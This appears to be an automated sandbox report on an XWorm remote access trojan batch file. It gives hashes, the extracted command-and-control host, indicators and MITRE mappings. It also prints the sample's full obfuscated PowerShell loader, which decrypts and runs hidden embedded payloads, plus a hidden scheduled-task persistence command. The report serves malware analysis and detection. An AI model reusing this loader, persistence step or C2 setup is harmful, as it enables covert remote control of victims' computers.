xworm | a7f49df64ba98d30e7a9f80997638f97d44b5163e818e167dbbc073bd55e2362

Analysis

max time kernel
129s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
02/10/2024, 01:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient3.bat
Size

264KB
MD5

96bc4a2abe18426797c6c63b05b275b3
SHA1

0cdcf4d9b03ff0624f2ac8793a5fa315a98d4e16
SHA256

a7f49df64ba98d30e7a9f80997638f97d44b5163e818e167dbbc073bd55e2362
SHA512

28ca089ac3bfbe21b9c37c20c347ad68da03c65e1687674b0a437cacfdc59d737576c12149f3b903588d3b50aab71c185e0ec36a0831ba0398b9f56fa52e28e6
SSDEEP

6144:6G98bC57ublkrWd3leRpXteJsPYAifRaqKEdd8E:9D57uZ4s3lgNwA8db8E

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:47628

employment-celebs.gl.at.ply.gg:47628

Mutex

UrZFZ6UDLpSiVpzn

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4764-118-0x0000014ABA2D0000-0x0000014ABA2E0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	4764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4372	powershell.exe
1840	powershell.exe
4764	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeIncreaseQuotaPrivilege	1840	powershell.exe
Token: SeSecurityPrivilege	1840	powershell.exe
Token: SeTakeOwnershipPrivilege	1840	powershell.exe
Token: SeLoadDriverPrivilege	1840	powershell.exe
Token: SeSystemProfilePrivilege	1840	powershell.exe
Token: SeSystemtimePrivilege	1840	powershell.exe
Token: SeProfSingleProcessPrivilege	1840	powershell.exe
Token: SeIncBasePriorityPrivilege	1840	powershell.exe
Token: SeCreatePagefilePrivilege	1840	powershell.exe
Token: SeBackupPrivilege	1840	powershell.exe
Token: SeRestorePrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeSystemEnvironmentPrivilege	1840	powershell.exe
Token: SeRemoteShutdownPrivilege	1840	powershell.exe
Token: SeUndockPrivilege	1840	powershell.exe
Token: SeManageVolumePrivilege	1840	powershell.exe
Token: 33	1840	powershell.exe
Token: 34	1840	powershell.exe
Token: 35	1840	powershell.exe
Token: 36	1840	powershell.exe
Token: SeIncreaseQuotaPrivilege	1840	powershell.exe
Token: SeSecurityPrivilege	1840	powershell.exe
Token: SeTakeOwnershipPrivilege	1840	powershell.exe
Token: SeLoadDriverPrivilege	1840	powershell.exe
Token: SeSystemProfilePrivilege	1840	powershell.exe
Token: SeSystemtimePrivilege	1840	powershell.exe
Token: SeProfSingleProcessPrivilege	1840	powershell.exe
Token: SeIncBasePriorityPrivilege	1840	powershell.exe
Token: SeCreatePagefilePrivilege	1840	powershell.exe
Token: SeBackupPrivilege	1840	powershell.exe
Token: SeRestorePrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeSystemEnvironmentPrivilege	1840	powershell.exe
Token: SeRemoteShutdownPrivilege	1840	powershell.exe
Token: SeUndockPrivilege	1840	powershell.exe
Token: SeManageVolumePrivilege	1840	powershell.exe
Token: 33	1840	powershell.exe
Token: 34	1840	powershell.exe
Token: 35	1840	powershell.exe
Token: 36	1840	powershell.exe
Token: SeIncreaseQuotaPrivilege	1840	powershell.exe
Token: SeSecurityPrivilege	1840	powershell.exe
Token: SeTakeOwnershipPrivilege	1840	powershell.exe
Token: SeLoadDriverPrivilege	1840	powershell.exe
Token: SeSystemProfilePrivilege	1840	powershell.exe
Token: SeSystemtimePrivilege	1840	powershell.exe
Token: SeProfSingleProcessPrivilege	1840	powershell.exe
Token: SeIncBasePriorityPrivilege	1840	powershell.exe
Token: SeCreatePagefilePrivilege	1840	powershell.exe
Token: SeBackupPrivilege	1840	powershell.exe
Token: SeRestorePrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeSystemEnvironmentPrivilege	1840	powershell.exe
Token: SeRemoteShutdownPrivilege	1840	powershell.exe
Token: SeUndockPrivilege	1840	powershell.exe
Token: SeManageVolumePrivilege	1840	powershell.exe
Token: 33	1840	powershell.exe
Token: 34	1840	powershell.exe
Token: 35	1840	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3244 wrote to memory of 4372	3244	cmd.exe	72
PID 3244 wrote to memory of 4372	3244	cmd.exe	72
PID 4372 wrote to memory of 1840	4372	powershell.exe	73
PID 4372 wrote to memory of 1840	4372	powershell.exe	73
PID 4372 wrote to memory of 3316	4372	powershell.exe	76
PID 4372 wrote to memory of 3316	4372	powershell.exe	76
PID 3316 wrote to memory of 4164	3316	WScript.exe	77
PID 3316 wrote to memory of 4164	3316	WScript.exe	77
PID 4164 wrote to memory of 4764	4164	cmd.exe	79
PID 4164 wrote to memory of 4764	4164	cmd.exe	79

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient3.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EtddqEFaK2tKpcoM52jrp4Zm7Jwx1Y5bW6f1Q6ZnQ+o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gBOnn0mJlB7iuwDWSTwHCA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oRjBS=New-Object System.IO.MemoryStream(,$param_var); $lpYSD=New-Object System.IO.MemoryStream; $GuPTv=New-Object System.IO.Compression.GZipStream($oRjBS, [IO.Compression.CompressionMode]::Decompress); $GuPTv.CopyTo($lpYSD); $GuPTv.Dispose(); $oRjBS.Dispose(); $lpYSD.Dispose(); $lpYSD.ToArray();}function execute_function($param_var,$param2_var){ $nDjUr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JLFIu=$nDjUr.EntryPoint; $JLFIu.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient3.bat';$kEYxu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient3.bat').Split([Environment]::NewLine);foreach ($NlmNG in $kEYxu) { if ($NlmNG.StartsWith(':: ')) { $yyqIT=$NlmNG.Substring(3); break; }}$payloads_var=[string[]]$yyqIT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_804_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_804.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_804.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_804.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4164
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EtddqEFaK2tKpcoM52jrp4Zm7Jwx1Y5bW6f1Q6ZnQ+o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gBOnn0mJlB7iuwDWSTwHCA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oRjBS=New-Object System.IO.MemoryStream(,$param_var); $lpYSD=New-Object System.IO.MemoryStream; $GuPTv=New-Object System.IO.Compression.GZipStream($oRjBS, [IO.Compression.CompressionMode]::Decompress); $GuPTv.CopyTo($lpYSD); $GuPTv.Dispose(); $oRjBS.Dispose(); $lpYSD.Dispose(); $lpYSD.ToArray();}function execute_function($param_var,$param2_var){ $nDjUr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JLFIu=$nDjUr.EntryPoint; $JLFIu.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_804.bat';$kEYxu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_804.bat').Split([Environment]::NewLine);foreach ($NlmNG in $kEYxu) { if ($NlmNG.StartsWith(':: ')) { $yyqIT=$NlmNG.Substring(3); break; }}$payloads_var=[string[]]$yyqIT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4764

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
22bd20a6ebf6a7079fb7faa2984305dc

SHA1
900d4cf8ba49159020ee9a9f8e0d636ddc8bd4c2

SHA256
70d56c8ea943500bb6c3b49f0d906e77b4fcfc9a0f72c913ecf770059a19e926

SHA512
cb674ba66295f9398b54ff5f2d9faf65654adb42583d25998072a65296649a91f7ea309ef09cd4d22c0492235bdfc452b230ce0417f567909d5af5c3f1496e52

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d02zj2bl.3ju.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_804.bat

Filesize
264KB

MD5
96bc4a2abe18426797c6c63b05b275b3

SHA1
0cdcf4d9b03ff0624f2ac8793a5fa315a98d4e16

SHA256
a7f49df64ba98d30e7a9f80997638f97d44b5163e818e167dbbc073bd55e2362

SHA512
28ca089ac3bfbe21b9c37c20c347ad68da03c65e1687674b0a437cacfdc59d737576c12149f3b903588d3b50aab71c185e0ec36a0831ba0398b9f56fa52e28e6

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_804.vbs

Filesize
115B

MD5
66fca366aefe188bd40d12c729774e45

SHA1
4fcb1a574f3eee73a129cb6453262af997481e98

SHA256
4d7277ebcdb535147c7cf9a97e2ee9666bebce05ee42cf56e7aa3e0610911913

SHA512
1572d384e57331bd96cb87f9ab9160fff76257a60b2d55218e02211df6443ecd0ef6d4201016b58ed3b5f543ccd904723905f2452ad4abdec551d850a2d68a80

Download Submit
memory/1840-42-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/1840-41-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/1840-77-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/1840-45-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4372-0-0x00007FF862F13000-0x00007FF862F14000-memory.dmp

Filesize
4KB

Download
memory/4372-25-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4372-29-0x0000021B5E110000-0x0000021B5E144000-memory.dmp

Filesize
208KB

Download
memory/4372-58-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4372-73-0x00007FF862F13000-0x00007FF862F14000-memory.dmp

Filesize
4KB

Download
memory/4372-28-0x0000021B5DFB0000-0x0000021B5DFB8000-memory.dmp

Filesize
32KB

Download
memory/4372-20-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4372-11-0x0000021B5E150000-0x0000021B5E1C6000-memory.dmp

Filesize
472KB

Download
memory/4372-10-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4372-5-0x0000021B5DF80000-0x0000021B5DFA2000-memory.dmp

Filesize
136KB

Download
memory/4372-90-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4372-96-0x00007FF862F10000-0x00007FF8638FC000-memory.dmp

Filesize
9.9MB

Download
memory/4764-118-0x0000014ABA2D0000-0x0000014ABA2E0000-memory.dmp

Filesize
64KB

Download